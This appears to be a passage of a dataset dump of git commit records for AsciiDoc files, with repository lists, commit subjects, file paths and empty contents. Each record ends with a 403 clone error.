sposam\/elasticsearch,myelin\/elasticsearch,franklanganke\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nezirus\/elasticsearch,Ansh90\/elasticsearch,wbowling\/elasticsearch,wimvds\/elasticsearch,onegambler\/elasticsearch,fernandozhu\/elasticsearch,girirajsharma\/elasticsearch,ricardocerq\/elasticsearch,wimvds\/elasticsearch,nellicus\/elasticsearch,Collaborne\/elasticsearch,petabytedata\/elasticsearch,likaiwalkman\/elasticsearch,kenshin233\/elasticsearch,slavau\/elasticsearch,jbertouch\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,mortonsykes\/elasticsearch,btiernay\/elasticsearch,ulkas\/elasticsearch,rento19962\/elasticsearch,ImpressTV\/elasticsearch,lks21c\/elasticsearch,dpursehouse\/elasticsearch,rmuir\/elasticsearch,slavau\/elasticsearch,sc0ttkclark\/elasticsearch,slavau\/elasticsearch,springning\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,amit-shar\/elasticsearch,LewayneNaidoo\/elasticsearch,tkssharma\/elasticsearch,StefanGor\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,karthikjaps\/elasticsearch,lmtwga\/elasticsearch,spiegela\/elasticsearch,caengcjd\/elasticsearch,yuy168\/elasticsearch,yongminxia\/elasticsearch,kunallimaye\/elasticsearch,wenpos\/elasticsearch,lmtwga\/elasticsearch,18098924759\/elasticsearch,bawse\/elasticsearch,alexshadow007\/elasticsearch,mmaracic\/elasticsearch,ulkas\/elasticsearch,wimvds\/elasticsearch,avikurapati\/elasticsearch,i-am-Nathan\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,kenshin233\/elasticsearch,amit-shar\/elasticsearch,tkssharma\/elasticsearch,pritishppai\/elasticsearch,robin13\/elasticsearch,Shekharrajak\/elasticsearch,lmtwga\/elasticsearch,sdauletau\/elasticsearch,scottsom\/elasticsearch,hanswang\/elasticsearch,kalimatas\/elasticsearch,slavau\/elasticsearch,wittyameta\/elasticsearch,mmaracic\/elasticsearch,Stacey-Gammon\/elasticsearch,huanzhong\/elasticsearch,socialrank\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,vietlq\/elasticsearch,yongminxia\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,vingupta3\/elasticsearch,truemped\/elasticsearch,AndreKR\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kingaj\/elasticsearch,wimvds\/elasticsearch,pranavraman\/elasticsearch,jango2015\/elasticsearch,vroyer\/elassandra,nrkkalyan\/elasticsearch,ImpressTV\/elasticsearch,schonfeld\/elasticsearch,MichaelLiZhou\/elasticsearch,Liziyao\/elasticsearch,jimhooker2002\/elasticsearch,palecur\/elasticsearch,drewr\/elasticsearch,winstonewert\/elasticsearch,MaineC\/elasticsearch,IanvsPoplicola\/elasticsearch,iantruslove\/elasticsearch,apepper\/elasticsearch,pritishppai\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,sarwarbhuiyan\/elasticsearch,obourgain\/elasticsearch,infusionsoft\/elasticsearch,mm0\/elasticsearch,amit-shar\/elasticsearch,diendt\/elasticsearch,nrkkalyan\/elasticsearch,uschindler\/elasticsearch,petabytedata\/elasticsearch,sneivandt\/elasticsearch,pranavraman\/elasticsearch,wenpos\/elasticsearch,schonfeld\/elasticsearch,scottsom\/elasticsearch,Brijeshrpatel9\/elasticsearch,18098924759\/elasticsearch,pranavraman\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,jprante\/elasticsearch,lydonchandra\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,winstonewert\/elasticsearch,iantruslove\/elasticsearch,Widen\/elasticsearch,fred84\/elasticsearch,YosuaMichael\/elasticsearch,markwalkom\/elasticsearch,mcku\/elasticsearch,mnylen\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,JSCooke\/elasticsearch,btiernay\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,MaineC\/elasticsearch,Rygbee\/elasticsearch,gmarz\/elasticsearch,vietlq\/elasticsearch,mjhennig\/elasticsearch,himanshuag\/elasticsearch,KimTaehee\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mjhennig\/elasticsearch,tebriel\/elasticsearch,ouyangkongtong\/elasticsearch,ivansun1010\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,yuy168\/elasticsearch,vingupta3\/elasticsearch,gingerwizard\/elasticsearch,Liziyao\/elasticsearch,markharwood\/elasticsearch,ivansun1010\/elasticsearch,awislowski\/elasticsearch,iantruslove\/elasticsearch,snikch\/elasticsearch,rajanm\/elasticsearch,achow\/elasticsearch,iacdingping\/elasticsearch,a2lin\/elasticsearch,camilojd\/elasticsearch,glefloch\/elasticsearch,mcku\/elasticsearch,fekaputra\/elasticsearch,strapdata\/elassandra-test,i-am-Nathan\/elasticsearch,fernandozhu\/elasticsearch,a2lin\/elasticsearch,tsohil\/elasticsearch,jimczi\/elasticsearch,awislowski\/elasticsearch,pablocastro\/elasticsearch,dongjoon-hyun\/elasticsearch,pablocastro\/elasticsearch,nrkkalyan\/elasticsearch,jpountz\/elasticsearch,StefanGor\/elasticsearch,adrianbk\/elasticsearch,mortonsykes\/elasticsearch,Ansh90\/elasticsearch,wuranbo\/elasticsearch,pranavraman\/elasticsearch,Siddartha07\/elasticsearch,apepper\/elasticsearch,jimczi\/elasticsearch,abibell\/elasticsearch,tebriel\/elasticsearch,shreejay\/elasticsearch,linglaiyao1314\/elasticsearch,pablocastro\/elasticsearch,huanzhong\/elasticsearch,hanswang\/elasticsearch,rento19962\/elasticsearch,nomoa\/elasticsearch,vingupta3\/elasticsearch,strapdata\/elassandra-test,maddin2016\/elasticsearch,onegambler\/elasticsearch,rhoml\/elasticsearch,achow\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,MjAbuz\/elasticsearch,xuzha\/elasticsearch,rento19962\/elasticsearch,adrianbk\/elasticsearch,Helen-Zhao\/elasticsearch,socialrank\/elasticsearch,mnylen\/elasticsearch,masterweb121\/elasticsearch,linglaiyao1314\/elasticsearch,polyfractal\/elasticsearch,StefanGor\/elasticsearch,btiernay\/elasticsearch,mikemccand\/elasticsearch,jeteve\/elasticsearch,vingupta3\/elasticsearch,likaiwalkman\/elasticsearch,hirdesh2008\/elasticsearch,martinstuga\/elasticsearch,knight1128\/elasticsearch,nellicus\/elasticsearch,camilojd\/elasticsearch,tahaemin\/elasticsearch,MichaelLiZhou\/elasticsearch,MetSystem\/elasticsearch,knight1128\/elasticsearch,brandonkearby\/elasticsearch,henakamaMSFT\/elasticsearch,rlugojr\/elasticsearch,masterweb121\/elasticsearch,MetSystem\/elasticsearch,ZTE-PaaS\/elasticsearch,abibell\/elasticsearch,maddin2016\/elasticsearch,clintongormley\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,areek\/elasticsearch,slavau\/elasticsearch,wittyameta\/elasticsearch,PhaedrusTheGreek\/elasticsearch,episerver\/elasticsearch,mm0\/elasticsearch,Shepard1212\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,jchampion\/elasticsearch,jbertouch\/elasticsearch,knight1128\/elasticsearch,areek\/elasticsearch,dongjoon-hyun\/elasticsearch,markharwood\/elasticsearch,fernandozhu\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,nrkkalyan\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,vingupta3\/elasticsearch,nazarewk\/elasticsearch,davidvgalbraith\/elasticsearch,artnowo\/elasticsearch,nrkkalyan\/elasticsearch,adrianbk\/elasticsearch,mm0\/elasticsearch,mohit\/elasticsearch,strapdata\/elassandra-test,hanswang\/elasticsearch,qwerty4030\/elasticsearch,kenshin233\/elasticsearch,gmarz\/elasticsearch,ImpressTV\/elasticsearch,adrianbk\/elasticsearch,Brijeshrpatel9\/elasticsearch,jango2015\/elasticsearch,vroyer\/elasticassandra,YosuaMichael\/elasticsearch,PhaedrusTheGreek\/elasticsearch,hirdesh2008\/elasticsearch,bestwpw\/elasticsearch,martinstuga\/elasticsearch,martinstuga\/elasticsearch,mikemccand\/elasticsearch,infusionsoft\/elasticsearch,ESamir\/elasticsearch,18098924759\/elasticsearch,cwurm\/elasticsearch,nellicus\/elasticsearch,pranavraman\/elasticsearch,KimTaehee\/elasticsearch,slavau\/elasticsearch,JackyMai\/elasticsearch,masaruh\/elasticsearch,fekaputra\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MisterAndersen\/elasticsearch,sposam\/elasticsearch,C-Bish\/elasticsearch,franklanganke\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,TonyChai24\/ESSource,sarwarbhuiyan\/elasticsearch,kenshin233\/elasticsearch,mohit\/elasticsearch,franklanganke\/elasticsearch,wimvds\/elasticsearch,wbowling\/elasticsearch,acchen97\/elasticsearch,himanshuag\/elasticsearch,drewr\/elasticsearch,rhoml\/elasticsearch,kalburgimanjunath\/elasticsearch,petabytedata\/elasticsearch,beiske\/elasticsearch,lzo\/elasticsearch-1,himanshuag\/elasticsearch,queirozfcom\/elasticsearch,MetSystem\/elasticsearch,diendt\/elasticsearch,Collaborne\/elasticsearch,episerver\/elasticsearch,hirdesh2008\/elasticsearch,mcku\/elasticsearch,iamjakob\/elasticsearch,petabytedata\/elasticsearch,JervyShi\/elasticsearch,rento19962\/elasticsearch,jeteve\/elasticsearch,scottsom\/elasticsearch,Charlesdong\/elasticsearch,fekaputra\/elasticsearch,kaneshin\/elasticsearch,sc0ttkclark\/elasticsearch,markwalkom\/elasticsearch,henakamaMSFT\/elasticsearch,lydonchandra\/elasticsearch,GlenRSmith\/elasticsearch,Rygbee\/elasticsearch,mikemccand\/elasticsearch,spiegela\/elasticsearch,markwalkom\/elasticsearch,snikch\/elasticsearch,18098924759\/elasticsearch,lightslife\/elasticsearch,fekaputra\/elasticsearch,queirozfcom\/elasticsearch,masterweb121\/elasticsearch,liweinan0423\/elasticsearch,markwalkom\/elasticsearch,socialrank\/elasticsearch,strapdata\/elassandra5-rc,Helen-Zhao\/elasticsearch,jeteve\/elasticsearch,umeshdangat\/elasticsearch,abibell\/elasticsearch,pozhidaevak\/elasticsearch,avikurapati\/elasticsearch,jimhooker2002\/elasticsearch,davidvgalbraith\/elasticsearch,mgalushka\/elasticsearch,zkidkid\/elasticsearch,jbertouch\/elasticsearch,LeoYao\/elasticsearch,avikurapati\/elasticsearch,sneivandt\/elasticsearch,tkssharma\/elasticsearch,xingguang2013\/elasticsearch,zhiqinghuang\/elasticsearch,rhoml\/elasticsearch,tkssharma\/elasticsearch,infusionsoft\/elasticsearch,linglaiyao1314\/elasticsearch,queirozfcom\/elasticsearch,mbrukman\/elasticsearch,Ansh90\/elasticsearch,vietlq\/elasticsearch,jbertouch\/elasticsearch,lzo\/elasticsearch-1,diendt\/elasticsearch,pranavraman\/elasticsearch,springning\/elasticsearch,andrestc\/elasticsearch,girirajsharma\/elasticsearch,Collaborne\/elasticsearch,Shekharrajak\/elasticsearch,franklanganke\/elasticsearch,Widen\/elasticsearch,Widen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,F0lha\/elasticsearch,rlugojr\/elasticsearch,infusionsoft\/elasticsearch,queirozfcom\/elasticsearch,caengcjd\/elasticsearch,Collaborne\/elasticsearch,masaruh\/elasticsearch,ImpressTV\/elasticsearch,andrestc\/elasticsearch,artnowo\/elasticsearch,jeteve\/elasticsearch,F0lha\/elasticsearch,Charlesdong\/elasticsearch,nomoa\/elasticsearch,weipinghe\/elasticsearch,tahaemin\/elasticsearch,markharwood\/elasticsearch,zhiqinghuang\/elasticsearch,springning\/elasticsearch,lks21c\/elasticsearch,Shekharrajak\/elasticsearch,mgalushka\/elasticsearch,ckclark\/elasticsearch,elancom\/elasticsearch,mortonsykes\/elasticsearch,adrianbk\/elasticsearch,davidvgalbraith\/elasticsearch,franklanganke\/elasticsearch,GlenRSmith\/elasticsearch,Liziyao\/elasticsearch,apepper\/elasticsearch,camilojd\/elasticsearch,jprante\/elasticsearch,knight1128\/elasticsearch,zhiqinghuang\/elasticsearch,mnylen\/elasticsearch,Charlesdong\/elasticsearch,tebriel\/elasticsearch,achow\/elasticsearch,likaiwalkman\/elasticsearch,wenpos\/elasticsearch,myelin\/elasticsearch,kalburgimanjunath\/elasticsearch,yanjunh\/elasticsearch,ulkas\/elasticsearch,PhaedrusTheGreek\/elasticsearch,lydonchandra\/elasticsearch,elasticdog\/elasticsearch,wimvds\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,cnfire\/elasticsearch-1,petabytedata\/elasticsearch,alexshadow007\/elasticsearch,yanjunh\/elasticsearch,Brijeshrpatel9\/elasticsearch,pablocastro\/elasticsearch,qwerty4030\/elasticsearch,kaneshin\/elasticsearch,Charlesdong\/elasticsearch,iantruslove\/elasticsearch,elancom\/elasticsearch,elasticdog\/elasticsearch,uschindler\/elasticsearch,iamjakob\/elasticsearch,achow\/elasticsearch,masaruh\/elasticsearch,Helen-Zhao\/elasticsearch,mgalushka\/elasticsearch,mbrukman\/elasticsearch,yynil\/elasticsearch,martinstuga\/elasticsearch,elancom\/elasticsearch,Brijeshrpatel9\/elasticsearch,JervyShi\/elasticsearch,mbrukman\/elasticsearch,bestwpw\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,infusionsoft\/elasticsearch,naveenhooda2000\/elasticsearch,fforbeck\/elasticsearch,huanzhong\/elasticsearch,strapdata\/elassandra5-rc,bestwpw\/elasticsearch,mjhennig\/elasticsearch,vroyer\/elasticassandra,avikurapati\/elasticsearch,yongminxia\/elasticsearch,kunallimaye\/elasticsearch,andrestc\/elasticsearch,yynil\/elasticsearch,ImpressTV\/elasticsearch,sneivandt\/elasticsearch,petabytedata\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,iacdingping\/elasticsearch,tebriel\/elasticsearch,djschny\/elasticsearch,a2lin\/elasticsearch,camilojd\/elasticsearch,palecur\/elasticsearch,iacdingping\/elasticsearch,beiske\/elasticsearch,LewayneNaidoo\/elasticsearch,MetSystem\/elasticsearch,rhoml\/elasticsearch,linglaiyao1314\/elasticsearch,ImpressTV\/elasticsearch,jpountz\/elasticsearch,elancom\/elasticsearch,wuranbo\/elasticsearch,masaruh\/elasticsearch,masterweb121\/elasticsearch,bawse\/elasticsearch,clintongormley\/elasticsearch,onegambler\/elasticsearch,henakamaMSFT\/elasticsearch,caengcjd\/elasticsearch,trangvh\/elasticsearch,jchampion\/elasticsearch,socialrank\/elasticsearch,acchen97\/elasticsearch,wenpos\/elasticsearch,Ansh90\/elasticsearch,strapdata\/elassandra5-rc,masaruh\/elasticsearch,karthikjaps\/elasticsearch,yuy168\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,zkidkid\/elasticsearch,s1monw\/elasticsearch,mm0\/elasticsearch,myelin\/elasticsearch,nomoa\/elasticsearch,nilabhsagar\/elasticsearch,andrestc\/elasticsearch,jpountz\/elasticsearch,hydro2k\/elasticsearch,andrestc\/elasticsearch,xuzha\/elasticsearch,jimhooker2002\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,rajanm\/elasticsearch,bestwpw\/elasticsearch,s1monw\/elasticsearch,hirdesh2008\/elasticsearch,GlenRSmith\/elasticsearch,JervyShi\/elasticsearch,fforbeck\/elasticsearch,wittyameta\/elasticsearch,schonfeld\/elasticsearch,xuzha\/elasticsearch,ckclark\/elasticsearch,areek\/elasticsearch,Uiho\/elasticsearch,nezirus\/elasticsearch,JackyMai\/elasticsearch,polyfractal\/elasticsearch,xuzha\/elasticsearch,gmarz\/elasticsearch,Rygbee\/elasticsearch,Siddartha07\/elasticsearch,KimTaehee\/elasticsearch,Siddartha07\/elasticsearch,PhaedrusTheGreek\/elasticsearch,hafkensite\/elasticsearch,naveenhooda2000\/elasticsearch,himanshuag\/elasticsearch,Rygbee\/elasticsearch,zkidkid\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,andrejserafim\/elasticsearch,jimhooker2002\/elasticsearch,yongminxia\/elasticsearch,pablocastro\/elasticsearch,nrkkalyan\/elasticsearch,vietlq\/elasticsearch,lmtwga\/elasticsearch,djschny\/elasticsearch,mmaracic\/elasticsearch,wbowling\/elasticsearch,wittyameta\/elasticsearch,djschny\/elasticsearch,mohit\/elasticsearch,MjAbuz\/elasticsearch,hafkensite\/elasticsearch,girirajsharma\/elasticsearch,18098924759\/elasticsearch,pritishppai\/elasticsearch,wittyameta\/elasticsearch,episerver\/elasticsearch,knight1128\/elasticsearch,C-Bish\/elasticsearch,xingguang2013\/elasticsearch,vietlq\/elasticsearch,linglaiyao1314\/elasticsearch,ZTE-PaaS\/elasticsearch,hydro2k\/elasticsearch,ivansun1010\/elasticsearch,yanjunh\/elasticsearch,jimhooker2002\/elasticsearch,sc0ttkclark\/elasticsearch,Uiho\/elasticsearch,awislowski\/elasticsearch,iantruslove\/elasticsearch,elancom\/elasticsearch,rlugojr\/elasticsearch,caengcjd\/elasticsearch,GlenRSmith\/elasticsearch,ckclark\/elasticsearch,coding0011\/elasticsearch,karthikjaps\/elasticsearch,njlawton\/elasticsearch,yanjunh\/elasticsearch,diendt\/elasticsearch,abibell\/elasticsearch,jango2015\/elasticsearch,caengcjd\/elasticsearch,mmaracic\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,yongminxia\/elasticsearch,dylan8902\/elasticsearch,pritishppai\/elasticsearch,nilabhsagar\/elasticsearch,areek\/elasticsearch,sreeramjayan\/elasticsearch,nellicus\/elasticsearch,wangtuo\/elasticsearch,artnowo\/elasticsearch,trangvh\/elasticsearch,acchen97\/elasticsearch,huanzhong\/elasticsearch,shreejay\/elasticsearch,hanswang\/elasticsearch,truemped\/elasticsearch,YosuaMichael\/elasticsearch,Brijeshrpatel9\/elasticsearch,palecur\/elasticsearch,nazarewk\/elasticsearch,lydonchandra\/elasticsearch,btiernay\/elasticsearch,iacdingping\/elasticsearch,dongjoon-hyun\/elasticsearch,HonzaKral\/elasticsearch,hydro2k\/elasticsearch,glefloch\/elasticsearch,kingaj\/elasticsearch,Uiho\/elasticsearch,socialrank\/elasticsearch,mjhennig\/elasticsearch,JackyMai\/elasticsearch,beiske\/elasticsearch,mmaracic\/elasticsearch,YosuaMichael\/elasticsearch,tsohil\/elasticsearch,karthikjaps\/elasticsearch,LeoYao\/elasticsearch,dpursehouse\/elasticsearch,F0lha\/elasticsearch,jchampion\/elasticsearch,lightslife\/elasticsearch,YosuaMichael\/elasticsearch,a2lin\/elasticsearch,palecur\/elasticsearch,mbrukman\/elasticsearch,ckclark\/elasticsearch,artnowo\/elasticsearch,uschindler\/elasticsearch,ckclark\/elasticsearch,likaiwalkman\/elasticsearch,rhoml\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,andrejserafim\/elasticsearch,gmarz\/elasticsearch,myelin\/elasticsearch,rento19962\/elasticsearch,obourgain\/elasticsearch,MichaelLiZhou\/elasticsearch,s1monw\/elasticsearch,davidvgalbraith\/elasticsearch,nknize\/elasticsearch,clintongormley\/elasticsearch,brandonkearby\/elasticsearch,springning\/elasticsearch,Shekharrajak\/elasticsearch,kingaj\/elasticsearch,infusionsoft\/elasticsearch,zhiqinghuang\/elasticsearch,polyfractal\/elasticsearch,Stacey-Gammon\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch","old_file":"docs\/river\/index.asciidoc","new_file":"docs\/river\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4203fff737e918f0b250ab5f00b8e17ab032e9fd","subject":"Added waffle.io badge to master","message":"Added waffle.io badge to master\n","repos":"justhackit\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr,adi9090\/javaanpr,joshuagn\/ANPR","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"541b5223cb30048b6bc4b186479556c9d3ea9033","subject":"Readme","message":"Readme\n","repos":"Jiri-Kremser\/jbug-cassandra-slides","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Jiri-Kremser\/jbug-cassandra-slides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87c1bf27d54b2ff058f1ab6afa8ceb4df78f7981","subject":"Update 2015-07-07-Hello-World.adoc","message":"Update 2015-07-07-Hello-World.adoc","repos":"freekrai\/hubpress,freekrai\/hubpress,freekrai\/hubpress","old_file":"_posts\/2015-07-07-Hello-World.adoc","new_file":"_posts\/2015-07-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/freekrai\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08960033c2061b67b15844c343c66e89fd86bcac","subject":"Update 2016-04-04-Sensational.adoc","message":"Update 2016-04-04-Sensational.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-04-04-Sensational.adoc","new_file":"_posts\/2016-04-04-Sensational.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29aa4b20d6a92428d4b7a854c94cba5d43dcdede","subject":"Update 2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b485c0386c48c12474cfa95b417056714872569","subject":"Update 2017-10-13-zipper.adoc","message":"Update 2017-10-13-zipper.adoc","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-13-zipper.adoc","new_file":"_posts\/2017-10-13-zipper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f1c861418a4eb4b08d484223f0ec2e6ae78cfd1","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d4bceef1925c194f7d6a6abe9aaf0228f7c0222","subject":"Documentation improvements.","message":"Documentation improvements.\n","repos":"mccraigmccraig\/cats,OlegTheCat\/cats,yurrriq\/cats,tcsavage\/cats,funcool\/cats,alesguzik\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5d55ec1c96408aba7ab8cd2501f2814b1dff2d53","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aee181d5a02f5bf216392eb2c6a45eab4bfdd22a","subject":"Requirements Specifications draft","message":"Requirements Specifications draft\n","repos":"sdukshis\/syslog-amqp,sdukshis\/syslog-amqp","old_file":"docs\/SRS.adoc","new_file":"docs\/SRS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdukshis\/syslog-amqp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ea7aa4fdb48e99e27c7959e6e47bc7784545b90","subject":"Update docs","message":"Update docs\n","repos":"Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f1e627969038c3a42afe1627e69f18f2d9731fd","subject":"Update 2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"715722bc989d5db441d04839110a601178416515","subject":"Reorg of release notes to be more flexible as we add more releases in future","message":"Reorg of release notes to be more flexible as we add more releases in future\n\nChange-Id: I2199ac2aae97a4152a8ca2c20e405fd6b27bf7fd\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2091\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7769b240a4a6a2bb59051aa6796a0420791ca24a","subject":"Update 2016-01-06-Playing-with-CSS3-Filters.adoc","message":"Update 2016-01-06-Playing-with-CSS3-Filters.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-01-06-Playing-with-CSS3-Filters.adoc","new_file":"_posts\/2016-01-06-Playing-with-CSS3-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 